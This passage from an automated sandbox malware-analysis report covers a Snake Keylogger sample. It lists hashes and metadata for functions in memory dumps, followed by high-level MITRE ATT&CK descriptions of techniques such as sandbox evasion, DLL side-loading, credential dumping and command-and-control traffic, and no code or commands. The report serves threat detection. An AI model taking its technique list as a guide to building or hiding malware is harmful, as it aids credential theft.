Instruction Fuzzy Hash: 1141E574E01248CBDB18DFBAD9586EEBBB2AF89300F24C169C418BB259DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276E2B8 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966ca00da51f19082d9dff6049a2dd5926730704ee234ce13c7373496176fe75
Instruction ID: 90d60d92ee6b8e7915443d9e872b464cfe711b608a43bbfe40c216c624458d31
Opcode Fuzzy Hash: 966ca00da51f19082d9dff6049a2dd5926730704ee234ce13c7373496176fe75
Instruction Fuzzy Hash: 92410674E00648CBDB18DFAAC444AEDFBF2AF89304F24C029C818BB295DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276EFC1 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc9a6e6a0fe07990e68d28847fae7b3d356227e0aef33f99b4ded05def5788f
Instruction ID: 3f8f643bb9198ece54d6b916219a9a3acc5ae5198a76cb7fa883387883766357
Opcode Fuzzy Hash: ffc9a6e6a0fe07990e68d28847fae7b3d356227e0aef33f99b4ded05def5788f
Instruction Fuzzy Hash: 9B41D574E012088BDB18DFAAD9846EDBBF2AF89300F24C12AD419BB255DB355946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0276F871 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716366617e3cc63bd570ecc619165eb375fe303c6d28b3a41786cc3a62f731fd
Instruction ID: 4c123ea3071b16bf0ab4a038402207f3e8b2f701d9daf519654078d7159b4d38
Opcode Fuzzy Hash: 716366617e3cc63bd570ecc619165eb375fe303c6d28b3a41786cc3a62f731fd
Instruction Fuzzy Hash: 96410670E01248CBDB19DFAAD4446EDBBF2AF89300F24C169C819BB265DB355906CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0276C450 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb3e5cd1d567789f318db668197dd00cfc61d31803f90961c9890a1fa7ce815
Instruction ID: bbf2397c4fcddada6fb5cee1920f66aadc339d0b77788aea3e209766fb9a21fe
Opcode Fuzzy Hash: 4fb3e5cd1d567789f318db668197dd00cfc61d31803f90961c9890a1fa7ce815
Instruction Fuzzy Hash: 1F41E474E01208CBDB19DFBAD9486EEBBF2AF89300F24C12AD418BB255DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276F418 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3a26270071c87141fae11b862edebf652185828b00f9eeb522f8a73d3c1fc1
Instruction ID: 65e51a1c11615efdd278d065f9fccb7d68d0e71d94abc64e0e025cee4b229893
Opcode Fuzzy Hash: ab3a26270071c87141fae11b862edebf652185828b00f9eeb522f8a73d3c1fc1
Instruction Fuzzy Hash: C1411574D01208CFEB18DFAAD9446EEFBB2AF89300F20C029C419BB255DB345946CF41

Uniqueness

Uniqueness Score: -1.00%

Function 027608F1 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c098385a3bc9c56c41771b3bdc5e00cdb57891ab8b71d9c87129ceadd0c167
Instruction ID: eb06355932ce27c1115efb1d699343e79d7d732f3687455d6df7e48e33b3c31d
Opcode Fuzzy Hash: 40c098385a3bc9c56c41771b3bdc5e00cdb57891ab8b71d9c87129ceadd0c167
Instruction Fuzzy Hash: FF41F374E01648CFDB18DFAAD9546EDBBB2BF89300F24C12AD819AB254DB355946CF00

Uniqueness

Uniqueness Score: -1.00%

Function 0276D158 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e959016cd73f20feb3c364a43ce04897c7db4c749b96a20ca29cc23a9d311cd0
Instruction ID: 72b4f3ab38db309f4f4c7311cb8b1ffcbbb464a7e4241dd0e29e341acc53db6d
Opcode Fuzzy Hash: e959016cd73f20feb3c364a43ce04897c7db4c749b96a20ca29cc23a9d311cd0
Instruction Fuzzy Hash: A841F374E012488FEB18DFAAD9446EEBBF2AF89304F20C029C418BB255DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276CD01 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3125cd038bda010eb468fea2f8f002b58c5050ca53ee735b83bcb5a966a3b99
Instruction ID: 422db94618f0f8c35f654233f50f8ae8ea6f150061fbe380987d8ce2aafdc807
Opcode Fuzzy Hash: f3125cd038bda010eb468fea2f8f002b58c5050ca53ee735b83bcb5a966a3b99
Instruction Fuzzy Hash: 8041F574E00648CFEB19DFAAD9486EDBBB2AF89300F24D16AC418BB255DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276DE61 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6abb85a18b9d1e75fa971ed3e1428834dbf301b66688e3b5c974e2f7db671c5
Instruction ID: a9a6501f8d77d3fe47620dc10786fabd7c4e229a573011899a48e78e695de68f
Opcode Fuzzy Hash: d6abb85a18b9d1e75fa971ed3e1428834dbf301b66688e3b5c974e2f7db671c5
Instruction Fuzzy Hash: B041E5B4E016488FEB19DFBAD5446EEBBB2AF89300F24C129C818BB255DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276B2EF Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b676a1060b74ba5ad343838d3c9135df436d1857289c689436e5864700bee4f
Instruction ID: 7449865e56d21463e0b7582cbd6049edf31b694bc5cf27b89141473f0dd0e3b9
Opcode Fuzzy Hash: 1b676a1060b74ba5ad343838d3c9135df436d1857289c689436e5864700bee4f
Instruction Fuzzy Hash: 26410574E00208CFEB18DFAAD9446EEBBB2AF89304F24D12AC418BB255DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0276EB68 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96882c2d1b64d69954bcca023df88be03b920716d563409e76da55016dccea15
Instruction ID: 67dd8dd72c9a6cc9dcdbd26028bc53689d45958c9590c4a9755805be26ef7477
Opcode Fuzzy Hash: 96882c2d1b64d69954bcca023df88be03b920716d563409e76da55016dccea15
Instruction Fuzzy Hash: F541E574E01648CFDB19DFAAD544AEEBBF2AF89300F24C129D418BB255DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276E710 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe6c98925cc1fc08ea9fce3ff3fc5b7466104a48ee4da69563d35dd310fafab
Instruction ID: fa3b6e5dad87d7283966148babf2387dcc6f83eb7355478a8131f4ac62cbbbbb
Opcode Fuzzy Hash: 5fe6c98925cc1fc08ea9fce3ff3fc5b7466104a48ee4da69563d35dd310fafab
Instruction Fuzzy Hash: 3841E274E01248CBDB19DFAAD944AEEBBF2AF88300F24D129C818AB255DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276C8A8 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242e79609566ad76a2f3e6b26a6fca6e6299a0dbafd8e44daee5e4409a00cec9
Instruction ID: 394112266e867db4b04ae409bad6ddcd85a14524b0e00d24c35f0743434225ba
Opcode Fuzzy Hash: 242e79609566ad76a2f3e6b26a6fca6e6299a0dbafd8e44daee5e4409a00cec9
Instruction Fuzzy Hash: C8410470D016088BEB19DFBAD4486EDBBB2AF89304F20C02AC818BB254DB345906CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0276D5B0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56061f3544ea3fe253f860ad42732a6c5bf3fd36d9df2a36b77ae16d6b9e0d88
Instruction ID: 4c6dc0cf690ae109ae6ad579e9f27d0501d8cdb6f09f24199a2b83247e276102
Opcode Fuzzy Hash: 56061f3544ea3fe253f860ad42732a6c5bf3fd36d9df2a36b77ae16d6b9e0d88
Instruction Fuzzy Hash: 2F41F570E00648CFDB28DFAAD5446EEBBF2AF89300F24C069C418BB2A5DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0276B752 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c03302eb45e80e93cb3193bbd4991c8c7ea2289f6b9cb511b34bb07edab9ee2
Instruction ID: d6f5bed4dab62258e0c4da736b4e9d217e913f1c32393630267c8e0197cacc86
Opcode Fuzzy Hash: 4c03302eb45e80e93cb3193bbd4991c8c7ea2289f6b9cb511b34bb07edab9ee2
Instruction Fuzzy Hash: FF41E474E01248CBDB18DFAAD5546EEFBF2AF89304F24D129C418BB268DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02767BA8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63b5d82972cecd723d1656d46e6e3ec3c59309b8f19891434c6133184ddcde0
Instruction ID: b6ba5cd3e059037af01f55e997cc2634f3d998147328f6ec4d4bba7110ff7021
Opcode Fuzzy Hash: e63b5d82972cecd723d1656d46e6e3ec3c59309b8f19891434c6133184ddcde0
Instruction Fuzzy Hash: A931B3B1D016189BEB18CFAAD9887DDFBF6AF88314F14D16AD418A62A4DB740945CF10

Uniqueness

Uniqueness Score: -1.00%

Function 026660E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 02666126
\;]q, xrefs: 026660FE
\;]q, xrefs: 026660F4
\;]q, xrefs: 0266611A

Memory Dump Source

Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 792cf1af0b527a40ab0263f550f5b06637052a0e7f79f9448b0ce003001d6488
Instruction ID: 9fe58c7a1c87c49a4371b0ec3b39d6d2ed066971f726e5147bcf68ff98383bbb
Opcode Fuzzy Hash: 792cf1af0b527a40ab0263f550f5b06637052a0e7f79f9448b0ce003001d6488
Instruction Fuzzy Hash: 3101B171B400048FCB288E2CE498A35B7EEAF88664B154469E406CB372DA35DC42C780

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Zarefy4bOs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
Zarefy4bOs.exe

Function 026621A8 Relevance: 8.2, Strings: 6, Instructions: 692
COMMON

Function 02666790 Relevance: 6.7, Strings: 5, Instructions: 441
COMMON

Function 0266B388 Relevance: 6.6, Strings: 5, Instructions: 351
COMMON

Function 0266C1F0 Relevance: 6.4, Strings: 5, Instructions: 199
COMMON

Function 0266BF10 Relevance: 6.4, Strings: 5, Instructions: 197
COMMON

Function 0266CA92 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Function 0266C7B2 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Function 02664B31 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Function 0266C4D0 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Function 0266BC32 Relevance: 3.9, Strings: 3, Instructions: 167
COMMON

Function 0266B552 Relevance: 3.9, Strings: 3, Instructions: 152
COMMON

Function 02666EB8 Relevance: 10.5, Strings: 8, Instructions: 477
COMMON

Function 02668849 Relevance: 4.3, Strings: 3, Instructions: 503
COMMON